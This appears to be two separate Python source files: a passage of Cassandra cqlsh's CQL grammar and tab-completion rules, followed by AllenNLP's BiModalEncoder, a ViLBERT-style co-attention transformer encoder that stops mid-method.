'OldNetworkTopologyStrategy',
'NetworkTopologyStrategy'
)
replication_factor_strategies = (
'SimpleStrategy',
'org.apache.cassandra.locator.SimpleStrategy',
'OldNetworkTopologyStrategy',
'org.apache.cassandra.locator.OldNetworkTopologyStrategy'
)
consistency_levels = (
'ANY',
'ONE',
'TWO',
'THREE',
'QUORUM',
'ALL',
'LOCAL_QUORUM',
'EACH_QUORUM'
)
# if a term matches this, it shouldn't need to be quoted to be valid cql
valid_cql_word_re = re.compile(r"^(?:[a-z][a-z0-9_]*|-?[0-9][0-9.]*)$", re.I)
def __init__(self, *args, **kwargs):
pylexotron.ParsingRuleSet.__init__(self, *args, **kwargs)
# note: commands_end_with_newline may be extended by callers.
self.commands_end_with_newline = set()
self.set_keywords_as_syntax()
def completer_for(self, rulename, symname):
def registrator(f):
def completerwrapper(ctxt):
cass = ctxt.get_binding('cassandra_conn', None)
if cass is None:
return ()
return f(ctxt, cass)
completerwrapper.func_name = 'completerwrapper_on_' + f.func_name
self.register_completer(completerwrapper, rulename, symname)
return completerwrapper
return registrator
def explain_completion(self, rulename, symname, explanation=None):
if explanation is None:
explanation = '<%s>' % (symname,)
@self.completer_for(rulename, symname)
def explainer(ctxt, cass):
return [Hint(explanation)]
return explainer
def set_keywords_as_syntax(self):
syntax = []
for k in self.keywords:
syntax.append('<K_%s> ::= "%s" ;' % (k.upper(), k))
self.append_rules('\n'.join(syntax))
def cql_massage_tokens(self, toklist):
curstmt = []
output = []
term_on_nl = False
for t in toklist:
if t[0] == 'endline':
if term_on_nl:
t = ('endtoken',) + t[1:]
else:
# don't put any 'endline' tokens in output
continue
curstmt.append(t)
if t[0] == 'endtoken':
term_on_nl = False
output.extend(curstmt)
curstmt = []
else:
if len(curstmt) == 1:
# first token in statement; command word
cmd = t[1].lower()
term_on_nl = bool(cmd in self.commands_end_with_newline)
output.extend(curstmt)
return output
def cql_parse(self, text, startsymbol='Start'):
tokens = self.lex(text)
tokens = self.cql_massage_tokens(tokens)
return self.parse(startsymbol, tokens, init_bindings={'*SRC*': text})
def cql_whole_parse_tokens(self, toklist, srcstr=None, startsymbol='Start'):
return self.whole_match(startsymbol, toklist, srcstr=srcstr)
def cql_split_statements(self, text):
tokens = self.lex(text)
tokens = self.cql_massage_tokens(tokens)
stmts = util.split_list(tokens, lambda t: t[0] == 'endtoken')
output = []
in_batch = False
for stmt in stmts:
if in_batch:
output[-1].extend(stmt)
else:
output.append(stmt)
if len(stmt) > 2:
if stmt[-3][0] == 'K_APPLY':
in_batch = False
elif stmt[0][0] == 'K_BEGIN':
in_batch = True
return output, in_batch
def cql_complete_single(self, text, partial, init_bindings={}, ignore_case=True,
startsymbol='Start'):
tokens = (self.cql_split_statements(text)[0] or [[]])[-1]
bindings = init_bindings.copy()
# handle some different completion scenarios- in particular, completing
# inside a string literal
prefix = None
dequoter = util.identity
lasttype = None
if tokens:
lasttype = tokens[-1][0]
if lasttype == 'unclosedString':
prefix = self.token_dequote(tokens[-1])
tokens = tokens[:-1]
partial = prefix + partial
dequoter = self.dequote_value
requoter = self.escape_value
elif lasttype == 'unclosedName':
prefix = self.token_dequote(tokens[-1])
tokens = tokens[:-1]
partial = prefix + partial
dequoter = self.dequote_name
requoter = self.escape_name
elif lasttype == 'unclosedComment':
return []
bindings['partial'] = partial
bindings['*LASTTYPE*'] = lasttype
bindings['*SRC*'] = text
# find completions for the position
completions = self.complete(startsymbol, tokens, bindings)
hints, strcompletes = util.list_bifilter(pylexotron.is_hint, completions)
# it's possible to get a newline token from completion; of course, we
# don't want to actually have that be a candidate, we just want to hint
if '\n' in strcompletes:
strcompletes.remove('\n')
if partial == '':
hints.append(Hint('<enter>'))
# find matches with the partial word under completion
if ignore_case:
partial = partial.lower()
f = lambda s: s and dequoter(s).lower().startswith(partial)
else:
f = lambda s: s and dequoter(s).startswith(partial)
candidates = filter(f, strcompletes)
if prefix is not None:
# dequote, re-escape, strip quotes: gets us the right quoted text
# for completion. the opening quote is already there on the command
# line and not part of the word under completion, and readline
# fills in the closing quote for us.
candidates = [requoter(dequoter(c))[len(prefix)+1:-1] for c in candidates]
# the above process can result in an empty string; this doesn't help for
# completions
candidates = filter(None, candidates)
# prefix a space when desirable for pleasant cql formatting
if tokens:
newcandidates = []
for c in candidates:
if self.want_space_between(tokens[-1], c) \
and prefix is None \
and not text[-1].isspace() \
and not c[0].isspace():
c = ' ' + c
newcandidates.append(c)
candidates = newcandidates
# append a space for single, complete identifiers
if len(candidates) == 1 and candidates[0][-1].isalnum() \
and lasttype != 'unclosedString' \
and lasttype != 'unclosedName':
candidates[0] += ' '
return candidates, hints
@staticmethod
def want_space_between(tok, following):
if following in (',', ')', ':'):
return False
if tok[0] == 'op' and tok[1] in (',', ')', '='):
return True
if tok[0] == 'stringLiteral' and following[0] != ';':
return True
if tok[0] == 'star' and following[0] != ')':
return True
if tok[0] == 'endtoken':
return True
if tok[1][-1].isalnum() and following[0] != ',':
return True
return False
def cql_complete(self, text, partial, cassandra_conn=None, ignore_case=True, debug=False,
startsymbol='Start'):
init_bindings = {'cassandra_conn': cassandra_conn}
if debug:
init_bindings['*DEBUG*'] = True
print "cql_complete(%r, partial=%r)" % (text, partial)
completions, hints = self.cql_complete_single(text, partial, init_bindings,
startsymbol=startsymbol)
if hints:
hints = [h.text for h in hints]
hints.append('')
if len(completions) == 1 and len(hints) == 0:
c = completions[0]
if debug:
print "** Got one completion: %r. Checking for further matches...\n" % (c,)
if not c.isspace():
new_c = self.cql_complete_multiple(text, c, init_bindings, startsymbol=startsymbol)
completions = [new_c]
if debug:
print "** New list of completions: %r" % (completions,)
return hints + completions
def cql_complete_multiple(self, text, first, init_bindings, startsymbol='Start'):
debug = init_bindings.get('*DEBUG*', False)
try:
completions, hints = self.cql_complete_single(text + first, '', init_bindings,
startsymbol=startsymbol)
except Exception:
if debug:
print "** completion expansion had a problem:"
traceback.print_exc()
return first
if hints:
if not first[-1].isspace():
first += ' '
if debug:
print "** completion expansion found hints: %r" % (hints,)
return first
if len(completions) == 1 and completions[0] != '':
if debug:
print "** Got another completion: %r." % (completions[0],)
if completions[0][0] in (',', ')', ':') and first[-1] == ' ':
first = first[:-1]
first += completions[0]
else:
common_prefix = util.find_common_prefix(completions)
if common_prefix == '':
return first
if common_prefix[0] in (',', ')', ':') and first[-1] == ' ':
first = first[:-1]
if debug:
print "** Got a partial completion: %r." % (common_prefix,)
first += common_prefix
if debug:
print "** New total completion: %r. Checking for further matches...\n" % (first,)
return self.cql_complete_multiple(text, first, init_bindings, startsymbol=startsymbol)
@classmethod
def is_valid_cql_word(cls, s):
return cls.valid_cql_word_re.match(s) is not None and s.lower() not in cls.keywords
@staticmethod
def cql_extract_orig(toklist, srcstr):
# low end of span for first token, to high end of span for last token
return srcstr[toklist[0][2][0]:toklist[-1][2][1]]
@staticmethod
def token_dequote(tok):
if tok[0] == 'stringLiteral':
# strip quotes
return tok[1][1:-1].replace("''", "'")
if tok[0] == 'unclosedString':
# strip one quote
return tok[1][1:].replace("''", "'")
if tok[0] == 'unclosedComment':
return ''
return tok[1]
@staticmethod
def token_is_word(tok):
return tok[0] == 'identifier'
@classmethod
def cql2_maybe_escape_name(cls, name):
if cls.is_valid_cql_word(name):
return name
return cls.cql2_escape_name(name)
# XXX: this doesn't really belong here.
@classmethod
def is_counter_col(cls, cfdef, colname):
col_info = [cm for cm in cfdef.column_metadata if cm.name == colname]
return bool(col_info and cqltypes.is_counter_type(col_info[0].validation_class))
@staticmethod
def cql2_dequote_value(cqlword):
cqlword = cqlword.strip()
if cqlword == '':
return cqlword
if cqlword[0] == "'" and cqlword[-1] == "'":
cqlword = cqlword[1:-1].replace("''", "'")
return cqlword
@staticmethod
def cql2_escape_value(value):
if value is None:
return 'NULL' # this totally won't work
if isinstance(value, bool):
value = str(value).lower()
elif isinstance(value, float):
return '%f' % value
elif isinstance(value, int):
return str(value)
return "'%s'" % value.replace("'", "''")
# use _name for keyspace, cf, and column names, and _value otherwise.
# also use the cql2_ prefix when dealing with cql2, or leave it off to
# get whatever behavior is default for this CqlParsingRuleSet.
cql2_dequote_name = dequote_name = dequote_value = cql2_dequote_value
cql2_escape_name = escape_name = escape_value = cql2_escape_value
maybe_escape_name = cql2_maybe_escape_name
dequote_any = cql2_dequote_value
CqlRuleSet = CqlParsingRuleSet()
# convenience for remainder of module
shorthands = ('completer_for', 'explain_completion',
'dequote_value', 'dequote_name',
'escape_value', 'escape_name',
'maybe_escape_name')
for shorthand in shorthands:
globals()[shorthand] = getattr(CqlRuleSet, shorthand)
# BEGIN SYNTAX/COMPLETION RULE DEFINITIONS
syntax_rules = r'''
<Start> ::= <CQL_Statement>*
;
<CQL_Statement> ::= [statements]=<statementBody> ";"
;
# the order of these terminal productions is significant:
<endline> ::= /\n/ ;
JUNK ::= /([ \t\r\f\v]+|(--|[/][/])[^\n\r]*([\n\r]|$)|[/][*].*?[*][/])/ ;
<stringLiteral> ::= /'([^']|'')*'/ ;
<float> ::= /-?[0-9]+\.[0-9]+/ ;
<integer> ::= /-?[0-9]+/ ;
<uuid> ::= /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/ ;
<identifier> ::= /[a-z][a-z0-9_]*/ ;
<colon> ::= ":" ;
<star> ::= "*" ;
<range> ::= ".." ;
<endtoken> ::= ";" ;
<op> ::= /[-+=,().]/ ;
<cmp> ::= /[<>]=?/ ;
<unclosedString> ::= /'([^']|'')*/ ;
<unclosedComment> ::= /[/][*][^\n]*$/ ;
<symbol> ::= <star>
| <range>
| <op>
| <cmp>
;
<name> ::= <identifier>
| <stringLiteral>
| <integer>
;
<term> ::= <stringLiteral>
| <integer>
| <float>
| <uuid>
;
<colname> ::= <term>
| <identifier>
| nocomplete=<K_KEY>
;
<statementBody> ::= <useStatement>
| <selectStatement>
| <dataChangeStatement>
| <schemaChangeStatement>
;
<dataChangeStatement> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
| <truncateStatement>
| <batchStatement>
;
<schemaChangeStatement> ::= <createKeyspaceStatement>
| <createColumnFamilyStatement>
| <createIndexStatement>
| <dropKeyspaceStatement>
| <dropColumnFamilyStatement>
| <dropIndexStatement>
| <alterTableStatement>
;
<consistencylevel> ::= cl=<identifier> ;
<storageType> ::= typename=( <identifier> | <stringLiteral> ) ;
<keyspaceName> ::= ksname=<name> ;
<columnFamilyName> ::= ( ksname=<name> "." )? cfname=<name> ;
'''
@completer_for('colname', 'nocomplete')
def nocomplete(ctxt, cass):
return ()
@completer_for('consistencylevel', 'cl')
def cl_completer(ctxt, cass):
return CqlRuleSet.consistency_levels
@completer_for('storageType', 'typename')
def storagetype_completer(ctxt, cass):
return cqltypes.cql_types
@completer_for('keyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_keyspace_names())
@completer_for('columnFamilyName', 'ksname')
def cf_ks_name_completer(ctxt, cass):
return [maybe_escape_name(ks) + '.' for ks in cass.get_keyspace_names()]
@completer_for('columnFamilyName', 'cfname')
def cf_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
cfnames = cass.get_columnfamily_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, cfnames)
def get_cfdef(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
cf = ctxt.get_binding('cfname')
return cass.get_columnfamily(cf, ksname=ks)
syntax_rules += r'''
<useStatement> ::= "USE" ksname=<keyspaceName>
;
<selectStatement> ::= "SELECT" <whatToSelect>
"FROM" cf=<columnFamilyName>
("USING" "CONSISTENCY" selcl=<consistencylevel>)?
("WHERE" <selectWhereClause>)?
("LIMIT" limit=<integer>)?
;
<selectWhereClause> ::= <relation> ("AND" <relation>)*
| keyname=<colname> "IN" "(" <term> ("," <term>)* ")"
;
<relation> ::= [rel_lhs]=<colname> ("=" | "<" | ">" | "<=" | ">=") <colname>
;
<whatToSelect> ::= colname=<colname> ("," colname=<colname>)*
| ("FIRST" <integer>)? "REVERSED"? (rangestart=<colname> ".." rangeend=<colname>
| "*")
| "COUNT" countparens="(" "*" ")"
;
'''
@completer_for('selectStatement', 'selcl')
def select_statement_consistencylevel(ctxt, cass):
return [cl for cl in CqlRuleSet.consistency_levels if cl != 'ANY']
@completer_for('selectWhereClause', 'keyname')
def select_where_keyname_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
return [cfdef.key_alias if cfdef.key_alias is not None else 'KEY']
@completer_for('relation', 'rel_lhs')
def select_relation_lhs_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
return map(maybe_escape_name, cass.filterable_column_names(cfdef))
@completer_for('whatToSelect', 'countparens')
def select_count_parens_completer(ctxt, cass):
return ['(*)']
explain_completion('whatToSelect', 'colname')
explain_completion('whatToSelect', 'rangestart', '<range_start>')
explain_completion('whatToSelect', 'rangeend', '<range_end>')
syntax_rules += r'''
<insertStatement> ::= "INSERT" "INTO" cf=<columnFamilyName>
"(" keyname=<colname> ","
[colname]=<colname> ( "," [colname]=<colname> )* ")"
"VALUES" "(" <term> "," <term> ( "," <term> )* ")"
( "USING" [insertopt]=<usingOption>
( "AND" [insertopt]=<usingOption> )* )?
;
<usingOption> ::= "CONSISTENCY" <consistencylevel>
| "TIMESTAMP" <integer>
| "TTL" <integer>
;
'''
@completer_for('insertStatement', 'keyname')
def insert_keyname_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
return [cfdef.key_alias if cfdef.key_alias is not None else 'KEY']
explain_completion('insertStatement', 'colname')
@completer_for('insertStatement', 'insertopt')
def insert_option_completer(ctxt, cass):
opts = set('CONSISTENCY TIMESTAMP TTL'.split())
for opt in ctxt.get_binding('insertopt', ()):
opts.discard(opt.split()[0])
return opts
syntax_rules += r'''
<updateStatement> ::= "UPDATE" cf=<columnFamilyName>
( "USING" [updateopt]=<usingOption>
( "AND" [updateopt]=<usingOption> )* )?
"SET" <assignment> ( "," <assignment> )*
"WHERE" <updateWhereClause>
;
<assignment> ::= updatecol=<colname> "=" update_rhs=<colname>
( counterop=( "+" | "-"? ) <integer> )?
;
<updateWhereClause> ::= updatefiltercol=<colname> "=" <term>
| updatefilterkey=<colname> filter_in="IN" "(" <term> ( "," <term> )* ")"
;
'''
@completer_for('updateStatement', 'updateopt')
def insert_option_completer(ctxt, cass):
opts = set('CONSISTENCY TIMESTAMP TTL'.split())
for opt in ctxt.get_binding('updateopt', ()):
opts.discard(opt.split()[0])
return opts
@completer_for('assignment', 'updatecol')
def update_col_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
colnames = map(maybe_escape_name, [cm.name for cm in cfdef.column_metadata])
return colnames + [Hint('<colname>')]
@completer_for('assignment', 'update_rhs')
def update_countername_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
return [maybe_escape_name(curcol)] if CqlRuleSet.is_counter_col(cfdef, curcol) else [Hint('<term>')]
@completer_for('assignment', 'counterop')
def update_counterop_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
return ['+', '-'] if CqlRuleSet.is_counter_col(cfdef, curcol) else []
@completer_for('updateWhereClause', 'updatefiltercol')
def update_filtercol_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
return map(maybe_escape_name, cass.filterable_column_names(cfdef))
@completer_for('updateWhereClause', 'updatefilterkey')
def update_filterkey_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
return [cfdef.key_alias if cfdef.key_alias is not None else 'KEY']
@completer_for('updateWhereClause', 'filter_in')
def update_filter_in_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
fk = ctxt.get_binding('updatefilterkey')
return ['IN'] if fk in ('KEY', cfdef.key_alias) else []
syntax_rules += r'''
<deleteStatement> ::= "DELETE" ( [delcol]=<colname> ( "," [delcol]=<colname> )* )?
"FROM" cf=<columnFamilyName>
( "USING" [delopt]=<deleteOption> ( "AND" [delopt]=<deleteOption> )* )?
"WHERE" <updateWhereClause>
;
<deleteOption> ::= "CONSISTENCY" <consistencylevel>
| "TIMESTAMP" <integer>
;
'''
@completer_for('deleteStatement', 'delopt')
def delete_opt_completer(ctxt, cass):
opts = set('CONSISTENCY TIMESTAMP'.split())
for opt in ctxt.get_binding('delopt', ()):
opts.discard(opt.split()[0])
return opts
explain_completion('deleteStatement', 'delcol', '<column_to_delete>')
syntax_rules += r'''
<batchStatement> ::= "BEGIN" "BATCH"
( "USING" [batchopt]=<usingOption>
( "AND" [batchopt]=<usingOption> )* )?
[batchstmt]=<batchStatementMember> ";"
( [batchstmt]=<batchStatementMember> ";" )*
"APPLY" "BATCH"
;
<batchStatementMember> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
;
'''
@completer_for('batchStatement', 'batchopt')
def batch_opt_completer(ctxt, cass):
opts = set('CONSISTENCY TIMESTAMP'.split())
for opt in ctxt.get_binding('batchopt', ()):
opts.discard(opt.split()[0])
return opts
syntax_rules += r'''
<truncateStatement> ::= "TRUNCATE" cf=<columnFamilyName>
;
'''
syntax_rules += r'''
<createKeyspaceStatement> ::= "CREATE" "KEYSPACE" ksname=<name>
"WITH" [optname]=<optionName> "=" [optval]=<optionVal>
( "AND" [optname]=<optionName> "=" [optval]=<optionVal> )*
;
<optionName> ::= <identifier> ( ":" ( <identifier> | <integer> ) )?
;
<optionVal> ::= <stringLiteral>
| <identifier>
| <integer>
;
'''
explain_completion('createKeyspaceStatement', 'ksname', '<new_keyspace_name>')
@completer_for('createKeyspaceStatement', 'optname')
def create_ks_opt_completer(ctxt, cass):
exist_opts = ctxt.get_binding('optname', ())
try:
stratopt = exist_opts.index('strategy_class')
except ValueError:
return ['strategy_class =']
vals = ctxt.get_binding('optval')
stratclass = dequote_value(vals[stratopt])
if stratclass in CqlRuleSet.replication_factor_strategies:
return ['strategy_options:replication_factor =']
return [Hint('<strategy_option_name>')]
@completer_for('createKeyspaceStatement', 'optval')
def create_ks_optval_completer(ctxt, cass):
exist_opts = ctxt.get_binding('optname', (None,))
if exist_opts[-1] == 'strategy_class':
return map(escape_value, CqlRuleSet.replication_strategies)
return [Hint('<option_value>')]
syntax_rules += r'''
<createColumnFamilyStatement> ::= "CREATE" ( "COLUMNFAMILY" | "TABLE" ) cf=<name>
"(" keyalias=<colname> <storageType> "PRIMARY" "KEY"
( "," colname=<colname> <storageType> )* ")"
( "WITH" [cfopt]=<cfOptionName> "=" [optval]=<cfOptionVal>
( "AND" [cfopt]=<cfOptionName> "=" [optval]=<cfOptionVal> )* )?
;
<cfOptionName> ::= cfoptname=<identifier> ( cfoptsep=":" cfsubopt=( <identifier> | <integer> ) )?
;
<cfOptionVal> ::= <identifier>
| <stringLiteral>
| <integer>
| <float>
;
'''
explain_completion('createColumnFamilyStatement', 'keyalias', '<new_key_name>')
explain_completion('createColumnFamilyStatement', 'cf', '<new_table_name>')
explain_completion('createColumnFamilyStatement', 'colname', '<new_column_name>')
@completer_for('cfOptionName', 'cfoptname')
def create_cf_option_completer(ctxt, cass):
return [c[0] for c in CqlRuleSet.columnfamily_options] + \
[c[0] + ':' for c in CqlRuleSet.columnfamily_map_options]
@completer_for('cfOptionName', 'cfoptsep')
def create_cf_suboption_separator(ctxt, cass):
opt = ctxt.get_binding('cfoptname')
if any(opt == c[0] for c in CqlRuleSet.columnfamily_map_options):
return [':']
return ()
@completer_for('cfOptionName', 'cfsubopt')
def create_cf_suboption_completer(ctxt, cass):
opt = ctxt.get_binding('cfoptname')
if opt == 'compaction_strategy_options':
# try to determine the strategy class in use
prevopts = ctxt.get_binding('cfopt', ())
prevvals = ctxt.get_binding('optval', ())
for prevopt, prevval in zip(prevopts, prevvals):
if prevopt == 'compaction_strategy_class':
csc = dequote_value(prevval)
break
else:
cf = ctxt.get_binding('cf')
try:
csc = cass.get_columnfamily(cf).compaction_strategy
except Exception:
csc = ''
csc = csc.split('.')[-1]
if csc == 'SizeTieredCompactionStrategy':
return ['min_sstable_size']
elif csc == 'LeveledCompactionStrategy':
return ['sstable_size_in_mb']
for optname, _, subopts in CqlRuleSet.columnfamily_map_options:
if opt == optname:
return subopts
return ()
def create_cf_option_val_completer(ctxt, cass):
exist_opts = ctxt.get_binding('cfopt')
this_opt = exist_opts[-1]
if this_opt == 'compression_parameters:sstable_compression':
return map(escape_value, CqlRuleSet.available_compression_classes)
if this_opt == 'compaction_strategy_class':
return map(escape_value, CqlRuleSet.available_compaction_classes)
if any(this_opt == opt[0] for opt in CqlRuleSet.obsolete_cf_options):
return ["'<obsolete_option>'"]
if this_opt in ('comparator', 'default_validation'):
return cqltypes.cql_types
if this_opt == 'read_repair_chance':
return [Hint('<float_between_0_and_1>')]
if this_opt in ('replicate_on_write', 'populate_io_cache_on_flush'):
return [Hint('<yes_or_no>')]
if this_opt in ('min_compaction_threshold', 'max_compaction_threshold', 'gc_grace_seconds'):
return [Hint('<integer>')]
return [Hint('<option_value>')]
completer_for('createColumnFamilyStatement', 'optval') \
(create_cf_option_val_completer)
syntax_rules += r'''
<createIndexStatement> ::= "CREATE" "INDEX" indexname=<identifier>? "ON"
cf=<name> "(" col=<colname> ")"
;
'''
explain_completion('createIndexStatement', 'indexname', '<new_index_name>')
@completer_for('createIndexStatement', 'cf')
def create_index_cf_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_columnfamily_names())
@completer_for('createIndexStatement', 'col')
def create_index_col_completer(ctxt, cass):
cfdef = cass.get_columnfamily(dequote_name(ctxt.get_binding('cf')))
colnames = [md.name for md in cfdef.column_metadata if md.index_name is None]
return map(maybe_escape_name, colnames)
syntax_rules += r'''
<dropKeyspaceStatement> ::= "DROP" "KEYSPACE" ksname=<keyspaceName>
;
'''
@completer_for('dropKeyspaceStatement', 'ksname')
def drop_ks_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_keyspace_names())
syntax_rules += r'''
<dropColumnFamilyStatement> ::= "DROP" ( "COLUMNFAMILY" | "TABLE" ) cf=<name>
;
'''
@completer_for('dropColumnFamilyStatement', 'cf')
def drop_cf_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_columnfamily_names())
syntax_rules += r'''
<dropIndexStatement> ::= "DROP" "INDEX" indexname=<name>
;
'''
@completer_for('dropIndexStatement', 'indexname')
def drop_index_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_index_names())
syntax_rules += r'''
<alterTableStatement> ::= "ALTER" ( "COLUMNFAMILY" | "TABLE" ) cf=<name> <alterInstructions>
;
<alterInstructions> ::= "ALTER" existcol=<name> "TYPE" <storageType>
| "ADD" newcol=<name> <storageType>
| "DROP" existcol=<name>
| "WITH" [cfopt]=<cfOptionName> "=" [optval]=<cfOptionVal>
( "AND" [cfopt]=<cfOptionName> "=" [optval]=<cfOptionVal> )*
;
'''
@completer_for('alterTableStatement', 'cf')
def alter_table_cf_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_columnfamily_names())
@completer_for('alterInstructions', 'existcol')
def alter_table_col_completer(ctxt, cass):
cfdef = cass.get_columnfamily(dequote_name(ctxt.get_binding('cf')))
cols = [md.name for md in cfdef.column_metadata]
if cfdef.key_alias is not None:
cols.append(cfdef.key_alias)
return map(maybe_escape_name, cols)
explain_completion('alterInstructions', 'newcol', '<new_column_name>')
completer_for('alterInstructions', 'optval') \
(create_cf_option_val_completer)
# END SYNTAX/COMPLETION RULE DEFINITIONS
CqlRuleSet.append_rules(syntax_rules)
| |
from typing import Optional, List, TYPE_CHECKING
import torch
from allennlp.common import FromParams
from allennlp.modules.util import replicate_layers
from allennlp.modules.transformer.transformer_layer import TransformerLayer
from allennlp.modules.transformer.bimodal_connection_layer import BiModalConnectionLayer
from allennlp.modules.transformer.transformer_module import TransformerModule
if TYPE_CHECKING:
from transformers.configuration_utils import PretrainedConfig
class BiModalEncoder(TransformerModule, FromParams):
"""
This module encodes two modalities separately, and performs bi-directional
attention using a connection layer. It is based on the modified BertEncoder in
the paper: [ViLBERT: Pretraining Task-Agnostic Visiolinguistic Representations
for Vision-and-Language Tasks](https://api.semanticscholar.org/CorpusID:199453025)
# Parameters
num_hidden_layers1: `int` (default = `12`)
Number of hidden layers in the transformer block for the first modality.
num_hidden_layers2: `int` (default = `12`)
Number of hidden layers in the transformer block for the second modality.
hidden_size1: `int` (default = `1024`)
hidden_size2: `int` (default = `1024`)
combined_hidden_size: `int` (default = `1024`)
Hidden size for the connection layer.
intermediate_size1: `int` (default = `1024`)
intermediate_size2: `int` (default = `1024`)
num_attention_heads1: `int` (default = `8`)
num_attention_heads2: `int` (default = `8`)
combined_num_attention_heads: `int` (default = `8`)
Number of attention heads in the connection layer.
attention_dropout1: `float` (default = `0.1`)
hidden_dropout1: `float` (default = `0.1`)
attention_dropout2: `float` (default = `0.1`)
hidden_dropout2: `float` (default = `0.1`)
biattention_id1: `List`, optional (default = `[1]`)
biattention_id2: `List`, optional (default = `[1]`)
fixed_layer1: `int` (default = `0`)
fixed_layer2: `int` (default = `0`)
fast_mode: `bool` (default = `False`)
with_coattention: `bool` (default = `True`)
in_batch_pairs: `bool` (default = `False`)
"""
_pretrained_mapping = {"layer": "layers1"}
_pretrained_relevant_module = ["encoder", "bert.encoder"]
_pretrained_allow_missing = [r"^layers2\..*", r"^c_layer\..*"]
def __init__(
self,
num_hidden_layers1: int = 12,
num_hidden_layers2: int = 12,
hidden_size1: int = 1024,
hidden_size2: int = 1024,
combined_hidden_size: int = 1024,
intermediate_size1: int = 1024,
intermediate_size2: int = 1024,
num_attention_heads1: int = 8,
num_attention_heads2: int = 8,
combined_num_attention_heads: int = 8,
attention_dropout1: float = 0.1,
hidden_dropout1: float = 0.1,
attention_dropout2: float = 0.1,
hidden_dropout2: float = 0.1,
activation: str = "relu",
biattention_id1: Optional[List[int]] = None,
biattention_id2: Optional[List[int]] = None,
fixed_layer1: int = 0,
fixed_layer2: int = 0,
fast_mode: bool = False,
with_coattention: bool = True,
in_batch_pairs: bool = False,
):
super().__init__()
self.FAST_MODE = fast_mode
self.with_coattention = with_coattention
self.biattention_id1 = biattention_id1 or [1]
self.biattention_id2 = biattention_id2 or [1]
self.in_batch_pairs = in_batch_pairs
self.fixed_layer1 = fixed_layer1
self.fixed_layer2 = fixed_layer2
self.combined_size = combined_hidden_size
self.hidden_size1 = hidden_size1
self.hidden_size2 = hidden_size2
layer1 = TransformerLayer(
hidden_size=hidden_size1,
intermediate_size=intermediate_size1,
num_attention_heads=num_attention_heads1,
attention_dropout=attention_dropout1,
hidden_dropout=hidden_dropout1,
activation=activation,
)
layer2 = TransformerLayer(
hidden_size=hidden_size2,
intermediate_size=intermediate_size2,
num_attention_heads=num_attention_heads2,
attention_dropout=attention_dropout2,
hidden_dropout=hidden_dropout2,
activation=activation,
)
connect_layer = BiModalConnectionLayer(
hidden_size1=hidden_size1,
hidden_size2=hidden_size2,
combined_hidden_size=combined_hidden_size,
intermediate_size1=intermediate_size1,
intermediate_size2=intermediate_size2,
num_attention_heads=combined_num_attention_heads,
dropout1=hidden_dropout1,
dropout2=hidden_dropout2,
activation=activation,
)
self.layers1 = replicate_layers(layer1, num_hidden_layers1)
self.layers2 = replicate_layers(layer2, num_hidden_layers2)
self.c_layer = replicate_layers(connect_layer, len(self.biattention_id2))
def forward(
self,
embedding1,
embedding2,
attention_mask1,
attention_mask2,
co_attention_mask=None,
output_all_encoded_layers=True,
):
start1 = 0
start2 = 0
count = 0
all_encoder_layers1 = []
all_encoder_layers2 = []
batch_size, num_words, hidden_size1 = embedding1.size()
_, num_regions, hidden_size2 = embedding2.size()
for layer_id2, layer_id1 in zip(self.biattention_id2, self.biattention_id1):
end1 = layer_id1
end2 = layer_id2
assert self.fixed_layer1 <= end1
assert self.fixed_layer2 <= end2
for idx in range(start1, self.fixed_layer1):
with torch.no_grad():
embedding1 = self.layers1[idx](embedding1, attention_mask1).hidden_states
start1 = self.fixed_layer1
for idx in range(start1, end1):
embedding1 = self.layers1[idx](embedding1, attention_mask1).hidden_states
for idx in range(start2, self.fixed_layer2):
with torch.no_grad():
embedding2 = self.layers2[idx](embedding2, attention_mask2).hidden_states
start2 = self.fixed_layer2
for idx in range(start2, end2):
embedding2 = self.layers2[idx](embedding2, attention_mask2).hidden_states
if count == 0 and self.in_batch_pairs:
# new batch size is the batch_size ^2
embedding2 = (
embedding2.unsqueeze(0)
.expand(batch_size, batch_size, num_regions, hidden_size2)
.contiguous()
.view(batch_size * batch_size, num_regions, hidden_size2)
)
attention_mask2 = (
attention_mask2.unsqueeze(0)
.expand(batch_size, batch_size, 1, 1, num_regions)
.contiguous()
.view(batch_size * batch_size, 1, 1, num_regions)
)
embedding1 = (
embedding1.unsqueeze(1)
.expand(batch_size, batch_size, num_words, hidden_size1)
.contiguous()
.view(batch_size * batch_size, num_words, hidden_size1)
)
attention_mask1 = (
attention_mask1.unsqueeze(1)
.expand(batch_size, batch_size, 1, 1, num_words)
.contiguous()
.view(batch_size * batch_size, 1, 1, num_words)
)
if co_attention_mask is not None:
co_attention_mask = (
co_attention_mask.unsqueeze(1)
.expand(batch_size, batch_size, 1, num_regions, num_words)
.contiguous()
.view(batch_size * batch_size, 1, num_regions, num_words)
)
if count == 0 and self.FAST_MODE:
embedding1 = embedding1.expand(
embedding2.size(0),
embedding1.size(1),
embedding1.size(2),
)
attention_mask1 = attention_mask1.expand(
embedding2.size(0),
attention_mask1.size(1),
attention_mask1.size(2),
attention_mask1.size(3),
)
if self.with_coattention:
embedding1, embedding2 = self.c_layer[count](
embedding1,
attention_mask1,
embedding2,
attention_mask2,
co_attention_mask,
)
start2 = end2
start1 = end1
count += 1
